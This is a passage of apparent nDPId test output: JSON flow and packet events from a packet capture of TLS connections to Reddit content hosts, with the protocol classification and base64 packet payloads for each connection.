+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbEAAAAAoAL9ICltAAACBAWgBAIICql05hgAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJL0EwGjpsfoBJXgFyoAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdABmbR4V8rX10oBJXgNWtAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/oyw49PvcdTXoBJXgPwjAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} 
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2LoDvCIgBAB+6dhAAABAQgKqXTmKMLXOMY="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg341lbJOmgBAB+9vUAAABAQgKqXTmKMLXOMY="} 
+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 